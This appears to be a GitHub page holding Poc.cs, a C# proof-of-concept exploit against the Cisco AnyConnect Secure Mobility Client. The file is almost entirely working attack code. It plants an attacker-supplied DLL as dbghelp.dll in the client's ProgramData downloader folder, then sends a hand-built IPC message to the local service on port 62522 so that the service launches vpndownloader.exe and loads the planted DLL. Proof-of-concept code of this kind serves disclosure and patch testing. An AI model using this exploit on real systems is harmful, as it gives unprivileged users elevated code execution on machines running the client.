-
Notifications
You must be signed in to change notification settings - Fork 1
/
Poc.cs
114 lines (102 loc) · 3.61 KB
/
Poc.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
using System;
using System.IO;
using System.Net.Sockets;
public static class Poc {
private readonly static byte[] LAUNCH_COMMAND = new byte[] {
// Signature
0x4F, 0x43, 0x53, 0x43,
// Message header length
0x1A, 0x00,
// Message body length
0xE4, 0x00,
// IPC response
0xFF, 0xFF, 0xFF, 0xFF,
// Message user context
0x00, 0x00, 0x00, 0x00,
// Request message identifier
0x02, 0x00, 0x00, 0x00,
// Return IPC object
0x00, 0x00, 0x00, 0x00,
// Message type
0x01,
// Message identifier
0x02,
// File path
// C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
0x00, 0x01, // Type
0x00, 0x57, // Length
0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
0x78, 0x65, 0x00,
// Command line (command line should start with "CAC-" or other valid command)
// CAC-doesnt-matter
0x00, 0x02, // Type
0x00, 0x12, // Length
0x43, 0x41, 0x43, 0x2D, 0x64, 0x6F, 0x65, 0x73, 0x6E, 0x74, 0x2D, 0x6D,
0x61, 0x74, 0x74, 0x65, 0x72, 0x00,
// GUI desktop (not mandatory)
// WinSta0\Default
0x00, 0x04,
0x00, 0x10,
0x57, 0x69, 0x6E, 0x53, 0x74, 0x61, 0x30, 0x5C, 0x44, 0x65, 0x66, 0x61,
0x75, 0x6C, 0x74, 0x00,
// Use installed
// False
0x80, 0x05,
0x00, 0x00,
// Relocatable file path
// C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
0x00, 0x06,
0x00, 0x57,
0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
0x78, 0x65, 0x00
};
private readonly static string TARGET_DIRECTORY =
"C:\\ProgramData\\Cisco\\Cisco AnyConnect Secure Mobility Client\\Temp\\Downloader";
private readonly static string TARGET_DLL =
"dbghelp.dll";
private readonly static string PAYLOAD_DLL =
"poc.dll";
public static void Main(string[] arguments) {
TcpClient tcpClient = null;
try {
DirectoryInfo targetDirectory = new DirectoryInfo(TARGET_DIRECTORY);
if (targetDirectory.Exists == false)
{
targetDirectory.Create();
}
FileInfo payloadDll = new FileInfo(PAYLOAD_DLL);
if (payloadDll.Exists == false)
{
throw new Exception("Payload DLL missing from current directory");
}
payloadDll.CopyTo(Path.Combine(targetDirectory.FullName,
TARGET_DLL), true);
tcpClient = new TcpClient("127.0.0.1", 62522);
NetworkStream clientStream = tcpClient.GetStream();
clientStream.ReadTimeout = 5000;
clientStream.Write(LAUNCH_COMMAND, 0, LAUNCH_COMMAND.Length);
clientStream.Flush();
clientStream.ReadByte();
}
catch (Exception exception) {
Console.Error.WriteLine(exception);
}
finally {
if (tcpClient != null) {
tcpClient.Close();
}
}
}
}